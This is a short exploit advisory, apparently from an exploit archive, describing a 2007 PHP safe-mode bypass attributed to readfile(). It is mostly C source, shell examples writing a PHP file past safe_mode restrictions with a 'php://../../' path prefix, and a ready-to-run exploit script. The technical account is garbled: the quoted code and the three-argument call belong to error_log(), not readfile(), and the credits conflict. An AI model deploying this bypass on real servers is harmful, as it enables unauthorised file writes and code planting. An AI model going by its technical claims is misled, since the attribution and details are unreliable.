PHP versions below 4.4.4, 5.2.1, and 5.1.6 suffer from a readfile() safe mode bypass vulnerability.
2f92559142ea978bb19ae97f7de8910992d71b174807d71a769362f9bf62af97SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007
Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4
[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]
Author: ThE-WoLf-KsA)
Date:
- -Written: 24.3.2007
- --- 0.Description ---
- --- 1. readfile() Safe Mode Bypass ---
readfile() function read throu, file or display your file or path. You can
read into
files. Issue is very simple. readfile() check safe_mode and
open_basedir in stream function. But isn't allowed use URL. And
problem exists in incorrect filename.
PHP5:
- -2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt,
char *headers TSRMLS_DC)
{
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message",
message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option
not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP
option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a",
IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
- -2013-2050---
Let's see to option 3.
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---
Option "a", writte to file error or if file dosen't
exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined
"IGNORE_URL".
IGNORE_URL turn off safe_mode if you use
"prefix://../../".
- -Example---
cxib# php -r 'readfile("<? echo \"cx\";
?>", 3, "/www/temp/sr.php");'
Warning: readfile(): SAFE MODE Restriction in effect. The
script whose uid is 0 is not allowed to access /www/temp owned by
uid 80 in Command line code on line 1
Warning: readfile(/www/temp/sr.php): failed to open stream:
Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\";
?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
- --- 4. Greets ---
SniPer_hex
- --- 5. Contact ---
ThE-WolF-ksA@hotmail.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed